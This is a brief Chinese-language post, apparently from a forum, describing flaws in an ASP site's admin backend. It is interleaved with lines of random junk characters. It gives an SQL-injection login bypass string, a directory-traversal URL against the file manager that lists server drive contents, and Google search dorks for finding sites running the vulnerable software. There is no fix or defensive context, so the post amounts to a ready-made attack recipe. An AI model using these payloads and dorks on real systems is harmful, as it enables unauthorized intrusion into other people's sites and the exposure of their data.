后台万能密码 'or'='or'
5 Y. `1 x- Z5 ], C& K9 X4 i1 H- d
) @. G$ H1 ?4 t; y; m7 V后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!1 e5 S" K0 D3 P, [5 q& t h6 R$ Q. D
admin/uploadfile.asp?currentFolder=/upfiles/../
! k n4 h$ h; O7 G( a+ i" r) ?& p. |2 s2 G4 m
漏洞证明:
: S0 s( f2 X [$ W( h- f+ W3 F; [* z- |
谷歌:inurl:type.asp?id=1 新闻中心# w! C% s ?+ Y$ }9 ?5 y
或者 :inurl:download_ok.asp? x6 N6 W* S7 W. ?" o: b
' N5 M- f, S$ q7 ^3 K) O5 ^. | |